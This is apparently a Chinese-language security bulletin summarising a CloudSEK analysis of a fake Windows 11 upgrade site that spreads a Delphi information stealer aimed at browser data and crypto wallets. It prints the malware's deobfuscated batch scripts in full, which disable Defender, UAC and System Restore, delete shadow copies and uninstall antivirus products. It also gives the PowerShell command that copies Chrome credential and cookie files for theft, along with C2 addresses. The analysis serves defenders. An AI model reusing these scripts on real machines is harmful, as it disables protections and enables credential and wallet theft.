每日安全资讯小课堂

---

简要概述

研究人员警告Windows用户有关针对其系统的新恶意活动，其冒充Windows 11升级产品，该假工具嵌入了旨在从目标设备窃取数据的恶意软件。作为新恶意软件，该恶意软件目前逃脱了安全检测。因此，用户必须保持警惕并避免使用非官方的Windows 11资源。
根据印度网络安全公司CloudSEK最近的一份报告，该报告披露了一个恶意域：windows11-upgrade11[.]com传播了一个加密货币窃取程序。该网站声称提供免费的Windows 11系统升级以吸引用户。这个域名模仿合法的微软网站的布局来欺骗用户。因此，普通用户可能无法检测到欺诈行为，可能会单击可见的“立即下载”按钮。（尽管注意到网站的URL可能会引起危险，但大多数用户对注意到这些事情并不了解，尤其是当这些网站开始出现在搜索结果中时。）

单击“立即下载”按钮可下载一个系统上的.iso文件。（同样，这与微软提供Windows设置的方式类似。）然而，攻击者试图通过首先检查传入的请求是否来自TOR浏览器或VPN来逃避检测。恶意的.iso文件包括作为可执行（.exe）文件的恶意软件加载程序。

分析加载程序发现，攻击者使用Inno Setup 6.1.0构建了这个基于Delphi的加载程序。执行恶意软件加载程序会通过用多阶段恶意软件感染系统来开始攻击。最后一步涉及通过user32.CallWindowsProcA API部署和运行payload

该payload也是一个基于Delphi的恶意软件，具有强大的窃取功能。一旦感染目标系统，它就会从桌面和网络浏览器窃取数据。它还窃取加密钱包和存储的机密数据之后该恶意软件将所有被盗信息存储在临时目录中，最终将其发送到攻击者的C&C服务器。

术语解析

加密货币：自2008年问世以来，加密货币已经从一个不起眼的互联网趋势变成了主流，货币单位。加密货币不断升值，加上公众人物的支持，吸引了全球各地的用户。然而，这也促使攻击者进行诈骗，开发恶意软件，破坏加密交换，欺骗用户和合法加密业务。

加密货币钱包：加密货币钱包存储用户的公钥和私钥，同时提供易于使用的界面来管理加密余额。它们还支持通过区块链进行加密货币转账。一些钱包甚至允许用户使用其加密资产执行某些操作，例如买卖或与去中心化应用程序（DAPP）交互。

C&C服务器：英文： command and control server 翻译：指令和控制服务器，常指由攻击者搭建的服务器用于与被入侵系统进行数据交互与下达其它攻击指令有时也简称C2。

攻击流程

windows11-upgrade11[.]com伪装成Windows11升级网站以诱使用户进入

威胁参与者使用搜索引擎优化毒害来引诱用户访问该网站，并在该网站上传播含有恶意程序的Windows 11升级的文件。

运行会在目标系统上启动一个名为“XYZ”的多级恶意软件。

然后窃取恶意软件会窃取如下内容：

1.来自桌面的用户数据

2.网络浏览器数据，如cookie、浏览器用户数据等。

3.加密钱包和存储的机密数据

恶意域名细节披露

• 此域名通过某些技术出现在合法的搜索的结果中并通过域名构造使其看起来与Windows11升级相关进而诱使用户点击进入
• 单击结果中的页面时，用户将被引导到假域，该域显示为合法的Windows网站向毫无戒心的用户开放。
• 如果用户未使用TOR浏览器或VPN，网站将允许他们下载.iso文件，虚假宣传为最新的Windows 11升级。
• 在发布本报告时，VirusTotal上没有该恶意软件的样本或其他类似服务。

今天测试已被标识为恶意

之前的网页相关图片，目前测试无法访问

分析

恶意软件加载器被装在Windows 11 .iso文件（Windwos11-setup_11_14064.iso）中。

显示给用户的是一个名为windows11-setup_11_14064.exe的exe文件。

对文件内容的分析表明，它包括MZP头，它代表Pascal。

这是由Delphi二进制文件使用的标志字节。这表明该加载器是用Delphi编程语言编写的

值得注意的是，该活动中的所有恶意程序都是用Delphi编写的，或者它们采用了用Delphi编写封包器

恶意软件与C2的通信截图

恶意软件开发者使用Inno Setup 6.1.0构建了该加载器。Inno Setup是一个免费的安装程序用Delphi开发的用于Windows的免费安装程序。

在调试加载器时，会加载Inno Setup的元数据。这些信息有助于了解加载器程序的行为。

这个加载器在以下位置创建一个名为is-PN131.tmp的目录：C:\Users\\AppData\Local\Temp

在is-PN131.tmp目录下，创建了一个名为windows1-setup_11_14064.tmp的新文件，没有数据被添加到这个文件中。

一旦文件被创建，加载器就把数据写入其中。新文件的大小为3,078 KB，MZP是第一个字节。尽管这个文件的扩展名为.tmp，但它是一个可执行文件。

然后加载器通过CreateProcess Windows API生成一个新进程。这个API的命令行参数是：

"C:\Users\user\AppData\Local\Temp\is-IU2K8.tmp\windows11-setup_11_14064.tmp"
SL5="$320556,8141336,820224,C:\Users\jello\Desktop\windows11-setup_11_14064.exe" /verysilent /sp-

在进程列表中可以看到新进程windows11setup_11_14064.tmp的生成情况

Inno Setup特有信息

如前文所述，知道Inno Setup是这个恶意软件使用的Windows安装程序有助于我们可以理解该程序的行为。当运行一个程序时，Inno Setup表现出以下特点：

首先，在Inno中打包的父程序（在我们的例子中是加载器本身）创建一个子程序

进程，其命令行参数如下

/SL5
/SPAWNWND
/DEBUGWND
/NOTIFYWND

/SL5后面的目录路径是父进程的路径。这是由Inno使用的内部机制，用于进程间通信。

需要执行的文件被放在Temp用户目录中。所有的文件都会在安装程序退出后被删除。在安装程序退出后，所有的文件都会被删除，创建的目录将有以下类似名称：IS-XXXX.tmp

加载器脚本的执行

新创建的进程windows11-setup_11_14064.tmp，也就是子安装程序，将会 执行该恶意软件。加载器在C:\目录下创建一个新的临时程序，并转储以下内容：三个脚本和一个工具（应用程序）

脚本执行的特点

脚本的执行允许攻击者：

1. 通过Windows注册表停用系统保护
2. 执行WMIC，卸载目标系统上安装的安全产品
3. 通过PowerRun提升权限，将.scr、.cmd、.exe等排除在Windows Defender之外

加载器脚本的混淆

脚本的混淆模式与BatchObfuscator非常相似，后者公开发布并在这个GitHub资源库中公开提供

幸运的是，这个工具的GitHub资源库也提供了去混淆的逻辑。该脚本被成功解码，如下所示：

Deobfuscated contents of dfl.cmd

cls
@Echo Off
reG ADd "hklm\sOfTwaRe\MIcrosoFt\wiNdows\cURreNtvErsiOn\poLIcIEs\sYsteM" /v
"CoNSENtPrOmPTBehaVIoRADmIn" /T rEg_DworD /D "0" /f 2>NUl
rEG ADD "hKLm\sOfTwArE\mICroSOfT\wINDoWs\cuRreNtVERSiON\pOLicies\SySTeM" /v
"conSENtprOMpTBeHAvioRusEr" /t reG_dWord /D "0" /f 2>NUL
REG add "HKlm\soFtWare\MIcRoSoFT\WIndOWs\CURrENtVeRSION\PoLICieS\SYstEM" /V
"ProMPToNSECUredEskTop" /t REg_dwoRD /D "0" /F 2>NUl
reG adD "hKlm\sofTwARe\POLicIEs\MIcrosofT\WInDOwS dEFENdER\sPYNeT" /v "sUbmITSAmpLeScoNsEnt" /t
rEg_DworD /D "2" /f 2>NUL
REg ADd "HkLm\soFtWARe\pOLIcies\micRoSOFT\wINDOws DEFEnDeR\SpyNEt" /v "spynETrepoRTiNg" /t
reg_DWOrd /D "0" /F 2>nul
reG ADD "hKlM\SoFtwARE\pOLIcIeS\miCRoSOft\WINDows dEFENDER" /v "pUaPRoteCTiOn" /t reg_DwOrD /D "0"
/F 2>NuL
REG aDD "hkLm\SoftwARe\POliCIes\mICRosOfT\wIndOWs dEFENdEr\mpENgINE" /v "mPeNablEpUs" /T
rEg_dWORd /d "0" /f 2>nUL
rEG aDD "HkLM\SoFTWare\POlICIES\MICRosoft\wiNDoWs\sYstEm" /V "EnaBLESmArTSCrEEn" /T Reg_dwoRd /d
"0" /f 2>nuL
8
Reg aDD "hKLm\SOfTWArE\MicroSoFT\wiNdOwS\CURrenTVERsioN\eXpLorER" /v "SMaRtScReENenAbLeD" /T
reg_Sz /d "OfF" /F 2>Nul
ReG adD "HklM\SOfTWaRE\polICIes\miCROsoFt\mRt" /v "doNtoFFerThROUGHWuau" /t "REg_dWord" /d "1" /f
2>nUl
rEg ADD "hKlm\sOFTWARe\poLIcIES\miCRoSOFt\mRT" /V "dONtRepOrTinfECTioNINfOrmATION" /t "rEG_dworD"
/d "1" /F 2>nUL
REg adD "hklM\SOFTwaRE\poliCIes\micrOSoFt\wiNDowS DeFENdER\ux COnfIgUratiOn" /V
"nOTIFiCatIOn_SuPPrESs" /T Reg_DWord /D "1" /f 2>Nul
rEg ADD "hKLm\sOFtwaRe\POlicieS\micrOsOft\wInDoWs deFeNdEr\WIndowS dEFendeR eXploiT
guARd\coNtrolLed FoLDEr acCeSS" /v "ENABLEcOnTRoLleDFoldEraCcESS" /T REg_dwoRD /D "0" /F 2>NUL
reg aDD "hKLm\SOfTwArE\PolICIes\MIcrosOft\wiNDOWs DefendeR\reporTInG" /V
"DISAbLeEnhANceDnoTiFIcAtIoNs" /T rEg_dWORd /d "1" /f 2>nul
reG adD "hKlm\Software\MicroSOft\wINdoWS deFeNDEr SecURITY CENteR\NOtIFIcaTIOns" /V
"disABLeenhaNcEdnOtificAtions" /T REG_DWorD /D "1" /f 2>NuL
REg Add "HKLM\softwARE\MICroSOFt\WInDOws DefenDEr SecURiTY CENTER\ViRUs and Threat PRoTeCtioN" /v
"fILesbLOCKeDnOtifIcATiondIsABlEd" /T REg_dWord /d "1" /f 2>Nul
reg Add "hKLm\SofTWare\mICrOsOFt\wiNDoWs deFENDeR SECuriTY CeNTeR\ViRUS AND ThreAt ProteCtiOn" /v
"noAcTIoNnoTiFicaTioNdiSABLeD" /T reg_dWoRD /d "1" /F 2>nul
Reg aDD "hklm\softwArE\MICrOSOFT\WiNdOWs DEfeNDeR SECURity cenTEr\viruS AND THREat PROTeCTIon" /V
"SuMMaRYnOTIFiCATIOnDisABlED" /t REg_DWORd /D "1" /f 2>NuL
reG Add "hKLm\SOFtwArE\pOLIcies\mIcroSOft\wIndoWs\exPlOrer" /v "dISABlENotifiCAtIonCEntEr" /t Reg_dWord
/D "1" /f 2>nul
ReG Add "HKCU\SofTWARe\MicRosoft\WIndows\CUrrentVersIon\puShNoTIFicAtIoNS" /V "TOAsTeNAblEd" /t
ReG_dWOrd /d "0" /f 2>NuL
reG ADD "hklM\sOftwaRe\poLICiES\MICrOSOft\WindoWS DEfendEr securITy CenteR\VirUs ANd tHReat
PrOTECtIon" /v UILOcKDoWn /t Reg_dwoRD /d 1 /f 2>nuL
reg ADd "HkLM\SofTwaRe\policIES\miCRoSoFT\WindOws dEFendEr sECurITy cenTEr\apP anD BrOwseR
PrOTEctION" /V uIloCkDOWn /t ReG_dWOrD /d 1 /F 2>NUl
Reg aDD "HKLM\sOFTware\polICiES\MiCrOSoFt\winDoWs nt\sYsTeMREStOre" /V "dIsAblEConfIG" /t ReG_DWoRd
/D "1" /F 2>nUL
ReG ADd "HKLM\sofTwARe\POliciEs\miCROsofT\wInDowS NT\SYStemrESTorE" /v "disABlESR" /t reG_dWoRD /D
"1" /F 2>NUL
REG aDD "hkCu\sofTWaRE\MICROSOFT\wInDOWs\CUrREntvErSioN\poLicies\aTTAchMents" /v
"sAveZoneinformAtIoN" /t Reg_DworD /D "1" /f 2>nuL
ReG add "HKLM\soFtwaRE\micrOSOFT\windOWs\cURReNTversion\POLICIEs\ATtachMents" /v
"saVEZONEINFoRmatiON" /T rEg_DworD /d "1" /F 2>NUL
ReG AdD "HKlm\soFtWARe\MiCrosOFt\wiNDoWs\cURREnTVErsIoN\POlicIES\attacHmenTs" /V
"sCAnWITHaNtiviRUS" /t ReG_dword /D "1" /F 2>nUL
vssadmin delete shadows /all /quiet
wmic product where name="ESET Security" call uninstall /nointeractive
wmic product where name="AntimalwareEngine" call uninstall /nointeractive
wmic product where name="OnlineThreatsEngine" call uninstall /nointeractive
wmic product where name="FirewallEngine" call uninstall /nointeractive
wmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f 2>nul
cmd /c "%ProgramFiles%\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f 2>nul
del %0

Deobfuscated contents of pr.cmd

@echo off
pr.exe /SW:0 "reg.exe" add "HKLM\Software\Microsoft\Windows Defender\Exclusions\Extensions" /v "scr" /t
"REG_DWORD" /d "0" /f
pr.exe /SW:0 "reg.exe" add "HKLM\Software\Microsoft\Windows Defender\Exclusions\Extensions" /v "cmd" /t
9
"REG_DWORD" /d "0" /f
pr.exe /SW:0 "reg.exe" add "HKLM\Software\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /t
"REG_DWORD" /d "0" /f
pr.exe /SW:0 "reg.exe" add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t "REG_DWORD"
/d "0" /f
del %0

加载payload

在Inno Setup的最后阶段，一个扩展名为.scr的打包文件被放到了

C:\Users\\AppData\Roaming\Windows11InstallationAssistant目录。有趣的是Windows将.scr文件视为可执行文件。

scr文件是用VB编写的，如下图所示

下面的图片显示了封包软件二进制文件中被篡改的部分。"_9rW0;q: "部分作为作为一个解包存根，启动了对payload的解包。

解包程序通过生成一个名称与自己相同的新进程来执行payload，即"Windows11InstallationAssistant.scr"。在内存中的解包payload与下列C2终端对话

• 104.21.28.14
• 172.67.170.39

下面给出的是解压后的二进制文件，它是一个Delphi程序打包后的程序（scr文件）

创建了一个新的进程来执行这个Delphi payload。关于payload的细节 执行的细节将在下面的章节中介绍

代码执行

一个成功的解包会导致通过user32.CallWindowsProcA API执行payload。这是一种无症状方式，将控制权转移到最终的payload代码。将参数放在堆栈中的函数调用如下所示

第一个参数是一个指向内存中payload入口点的指针。

第二个参数是我们的SCR二进制文件的路径，是一个句柄。

当系统执行CallWindowProcA时，一个新的进程被创建，其名称与父进程同名。这个子进程承载了最终payload的代码。

父进程终止执行（就在执行了最后的payload之后），使用 ExitProcess API

最终payload的分析

最后的payload二进制文件是用Delphi编写的，其行为是一个窃取信息的恶意软件。该窃取程序进行以下活动：

• 窃取桌面上的用户数据
• 窃取网络浏览器数据，如cookies、浏览器用户数据等。
• 窃取加密钱包的数据和存储的机密

窃取程序采用了多线程模型来实现其所有的功能。以下的功能是通过多线程实现的：

• 网络管理
• 数据窃取

恶意软件使用PowerShell将数据复制到用户的Temp目录，然后将其发送到 C2（命令和控制）终端。下图所示的代码，是负责

执行PowerShell：

一旦PowerShell二进制文件的目录路径被恶意软件解析，它就会被CreateProcess API执行，如下所示：

传递给PowerShell处理的命令行参数如下所示。该恶意软件

使用 "Copy-Item "或 "CPI "来复制一个文件，并将其粘贴到扩展名为 "tmp "的Temp目录中。

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi
\"C:\Users\jello\AppData\Local\Google\Chrome\user Data\Default\Login Data\"
\"C:\Users\jello\AppData\Local\Temp\f92jrwif37240031.tmp\" -Force;cpi
\"C:\Users\jello\AppData\Local\Google\Chrome\user Data\Default\Web Data\"
\"C:\Users\jello\AppData\Local\Temp\n2b222z7tax1bf37240031.tmp\" -Force;cpi
\"C:\Users\jello\AppData\Local\Google\Chrome\user
Data\Default\Network\Cookies\"
\"C:\Users\jello\AppData\Local\Temp\24q57ir8bsq95hg37240125.tmp\" -Force;cpi
\"C:\Users\jello\AppData\Local\Google\Chrome\user Data\Default\..\Local State\"
\"C:\Users\jello\AppData\Local\Temp\f8mowh3b37240125.tmp\" -Force"

从进程列表中可以看到PowerShell的执行情况，如下所示

窃取程序所针对的浏览器：

窃取程序来猎取加密货币资产的字符串：

持久化

在装载机安装程序的初始运行期间，在启动目录中创建了一个lnk（快捷方式）文件。目录中创建一个lnk（快捷方式）文件，这是Windows上的自动启动扩展点之一。该恶意软件使用 icacls.exe来改变该文件的权限，从而避免删除这个lnk文件。

新创建的快捷方式文件指向之前讨论过的隐藏的scr文件，该文件位于以下位置。

C:\Users\username\AppData\Roaming\Windows11InstallationAssistant\Windwos11InstallationAssistant.scr

因此，该scr文件将在用户每次登录账户时执行。

网络分析

该恶意软件对窃取的数据进行加密，并将其传递给域名 "windows-server031.com"。该通信的细节显示如下：

被盗的文件首先被转储在用户的Temp文件夹中，并从那里的恶意软件将它们转移到C2服务器。

窃取程序的payload从域中获取一个用Delphi编写的程序，如上图所示。非常吸引人的是，该恶意软件只在夜间显示这种行为。

从调试器的输出可以看出，一个名为note.txt的文件被取走了。实际上，取来的文件是一个Delphi程序，并作为sysctle.exe在系统中执行。

有趣的是，新的进程描述显示Minecraft Launcher，如下图所示

sysctle.exe的感染链与windows11-setup_11_14064.exe相同，因为它有一个Inno安装阶段，部署各种脚本以杀死安全服务，并通过visual basic打包的scr文件diskinfo8.scr执行最终的Delphi payload。

Delphi的payload是通过一个visual basic打包的scr文件diskinfo8.scr来实现的。

diskinfo8.scr在内存中解压最终的payload，并通过user32.CallWindowsProcA执行

从内存中提取的解压后的Delphi二进制文件有以下假的描述：

payload是另一个窃取程序，能够进行以下操作：

• 窃取ClipBoard信息
• 窃取枚举的目录和数据

sysctle.exe的持久性机制与上述持久性部分提到的相同。

如下图所示，在用户的启动目录中创建一个快捷方式，指向

C:\Users\\AppData\Roaming\World Crystal Disk8\diskinfo8.scr。

安全软件查杀

CloudSEK 研究人员针对流行的防病毒解决方案扫描了从 Windows11InstallationAssistant.scr 和 diskinfo8.scr 文件中提取的payload，并发现了以下结果：

Windows11InstallationAssistant.scr:

diskinfo8.scr:

威胁特征标志 (IOCs)

防御措施

下载文件验证下载地址是否属于相关软件的官方，并与其公布的hash值对比验证是否被篡改

参考资料

• https://crypto.com/university/crypto-wallets
• https://www.trendmicro.com/vinfo/us/security/definition/command-and-control-server
• https://latesthackingnews.com/2022/04/24/watch-out-for-this-fake-windows-11-upgrade-lure/
• https://www.virustotal.com/gui/url/180040b5d73b3808f4e3e2dd406def88a7a3316d6f4397d038ffec5fa3b4cb16
• https://cloudsek.com/whitepapers_reports/information-stealer-targets-crypto-wallets-via-fake-windows-11-update/

语言版本